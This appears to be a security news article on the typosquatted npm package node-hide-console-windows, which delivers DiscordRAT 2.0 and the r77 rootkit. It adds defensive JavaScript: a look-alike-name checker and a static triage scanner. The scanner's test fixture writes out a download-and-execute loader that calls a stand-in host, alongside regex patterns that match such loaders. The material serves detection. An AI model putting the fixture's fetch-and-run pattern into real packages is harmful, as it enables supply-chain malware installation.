The trust we place in open-source repositories is being challenged. A deceptive package found in the npm registry has been caught deploying the open-source rootkit r77, a previously unseen case of a rogue npm package delivering rootkit capabilities.
Unmasking the Rogue
The suspicious package, node-hide-console-windows, impersonates the legitimate npm package node-hide-console-window, differing only by a trailing "s". This is a classic typosquatting campaign: attackers publish packages under misspelled or closely related names so that a developer who mistypes, or merely skims, an install command pulls in the malicious package instead. In the past two months it has been downloaded 704 times.
ReversingLabs, which first detected the package, found that it drops a Discord-controlled remote access trojan, which in turn plants the r77 rootkit. The broader concern is that open-source registries may become a growing channel for distributing malware.
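The one-character gap between node-hide-console-windows and node-hide-console-window is exactly what an edit-distance check catches before install. The following is an added example, not code from the article or from ReversingLabs: it compares each dependency name against an allow-list of packages the team already trusts and flags names that are not on the list but sit within a couple of edits of one that is. The allow-list and dependency names are constructed for the demo; the distance threshold of 2 is an assumption to tune per project.

```javascript
// Added example (not from the original article or ReversingLabs): flag dependencies
// whose names sit within a small edit distance of a package you already trust.
// The allow-list and dependency names below are constructed for the demo.

// Optimal-string-alignment (Damerau-Levenshtein) distance: counts insertions,
// deletions, substitutions and adjacent transpositions, so "lodahs" is 1 from "lodash".
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      // adjacent transposition (e.g. "hs" <-> "sh") costs 1, not 2
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Returns one record per dependency that is NOT on the allow-list but is within
// maxDistance of an allow-listed name. Names already on the list are trusted as-is;
// names far from everything are left alone (they are unknown, not look-alikes).
function typosquatCandidates(deps, allowlist, maxDistance = 2) {
  const trusted = new Set(allowlist);
  const hits = [];
  for (const name of deps) {
    if (trusted.has(name)) continue;
    let closest = null;
    let best = Infinity;
    for (const known of allowlist) {
      const dist = editDistance(name, known);
      if (dist < best) { best = dist; closest = known; }
    }
    if (closest !== null && best <= maxDistance) hits.push({ name, closest, distance: best });
  }
  return hits;
}

// Constructed inputs: an allow-list of trusted names and a dependency list that
// contains the real-world look-alike from the article plus a transposed "lodash".
const ALLOWLIST = ['node-hide-console-window', 'lodash', 'express'];
const DEPENDENCIES = ['node-hide-console-windows', 'lodahs', 'express', 'left-pad'];

for (const hit of typosquatCandidates(DEPENDENCIES, ALLOWLIST)) {
  console.log(`${hit.name} is ${hit.distance} edit(s) from trusted package ${hit.closest}`);
}
```

Run it as a pre-install gate against the dependency names in package.json (or a lockfile) and treat every hit as a name that needs a human to confirm it was intended; "left-pad" is not flagged because it is far from every trusted name, which is the "unknown package" case a separate allow-list policy should handle.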
Delving Deeper into the Malice
Once executed, the rogue package's index.js fetches an executable and launches it immediately. That executable is DiscordRAT 2.0, a C#-based open-source trojan that lets attackers remotely control the victim's host through Discord, collect sensitive data, and disable security software. Its "!rootkit" command is what installs the r77 rootkit.
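The shape described here, package code that downloads a binary and runs it, is visible in the source before anything executes. The following is an added example, not code from the article or from ReversingLabs: a static triage pass over a package's manifest and source files that records lifecycle install hooks, child_process usage, remote fetches and URLs pointing at executables, then collapses them into a triage label. The manifest and index.js it scans are constructed stand-ins under a hypothetical package name and an invalid hostname, written to mimic the described download-then-run behaviour; the regexes are coarse heuristics, not a malware signature.

```javascript
// Added example (not from the original article or ReversingLabs): a static
// triage pass over a package's manifest and source files, looking for the
// install-time hook plus "fetch a binary, then run it" pattern that a loader
// like the one described above relies on. The manifest and index.js below are
// constructed stand-ins with an invalid hostname; they are not the real package.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic source patterns. They are coarse on purpose (e.g. "exec(" also
// matches RegExp.prototype.exec), so findings are leads for a human, not verdicts.
const SOURCE_PATTERNS = [
  { id: 'child_process', re: /require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]/ },
  { id: 'process_spawn', re: /\b(exec|execFile|spawn|execSync|spawnSync|execFileSync)\s*\(/ },
  { id: 'remote_fetch', re: /\b(https?\.get|fetch|axios\.get)\s*\(/ },
  { id: 'executable_url', re: /https?:\/\/[^\s'"]+\.(exe|dll|bat|cmd|ps1|msi)\b/i },
];

// Walks the parsed package.json and a {filename: source} map and returns findings.
function auditPackage(manifest, sources) {
  const findings = [];
  const scripts = (manifest && manifest.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) findings.push({ file: 'package.json', id: 'lifecycle_hook', detail: `${hook}: ${scripts[hook]}` });
  }
  for (const [file, text] of Object.entries(sources)) {
    for (const { id, re } of SOURCE_PATTERNS) {
      const m = text.match(re);
      if (m) findings.push({ file, id, detail: m[0] });
    }
  }
  return findings;
}

// Collapses findings into a triage label. Fetching a remote binary AND spawning a
// process is the download-and-execute shape; an install hook that pulls in
// child_process is worth a look even when no URL is visible in the source.
function verdict(findings) {
  const ids = new Set(findings.map((f) => f.id));
  const fetches = ids.has('remote_fetch') || ids.has('executable_url');
  if (fetches && ids.has('process_spawn')) return 'download-and-execute';
  if (ids.has('lifecycle_hook') && ids.has('child_process')) return 'suspicious';
  if (ids.size > 0) return 'review';
  return 'clean';
}

// Constructed sample under a hypothetical name, modelled on the behaviour
// described above: an install hook runs index.js, which fetches and runs a binary.
const SAMPLE_MANIFEST = { name: 'example-lookalike', version: '1.0.0', scripts: { postinstall: 'node index.js' } };
const SAMPLE_SOURCES = {
  'index.js': [
    "const https = require('https');",
    "const fs = require('fs');",
    "const { exec } = require('child_process');",
    "https.get('https://example.invalid/payload.exe', (res) => {",
    "  res.pipe(fs.createWriteStream('payload.exe')).on('finish', () => exec('payload.exe'));",
    "});",
  ].join('\n'),
};

for (const f of auditPackage(SAMPLE_MANIFEST, SAMPLE_SOURCES)) {
  console.log(`[${f.id}] ${f.file}: ${f.detail}`);
}
console.log('verdict:', verdict(auditPackage(SAMPLE_MANIFEST, SAMPLE_SOURCES)));
```

Point it at the unpacked tarball of a package before it is allowed into a build (reading package.json and the .js files into the sources map), and remember that a loader which only fetches and spawns at runtime, with no install hook, still trips the download-and-execute label here because the patterns are matched on source text rather than on the hook alone; obfuscated or string-built calls will slip past these regexes, which is why the output is a triage lead, not a verdict.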
Interestingly, this isn’t r77’s first malicious appearance. It's been part of multiple campaigns before, including those that distributed the SeroXen trojan and even cryptocurrency miners.
Additionally, node-hide-console-windows has been observed fetching Blank-Grabber, another open-source information stealer. The entire campaign is assembled from components publicly available online, which shows that even low-skilled threat actors can now mount supply-chain attacks.
Key Terms Glossary
Rootkit: Software designed to conceal the presence of other malicious code (processes, files, network connections) on a system and to preserve the attacker's privileged access to it.
npm Registry: The public repository of packages for the JavaScript ecosystem, from which the npm package manager installs dependencies.
Typosquatting: Publishing a package (or registering a domain) under a name that is a misspelling or near-duplicate of a legitimate one, counting on users to mistype or misread it.
r77: An open-source rootkit used to hide files and processes.
DiscordRAT 2.0: A C#-based open-source trojan offering remote control capabilities over Discord.
Summary
The discovery of the rogue npm package serves as a wake-up call. Open-source repositories, while providing immense value, can also be exploited by cybercriminals. Developers should verify the exact name and publisher of a package before installing it; in this case a single extra character was all that separated the rogue package from the legitimate one.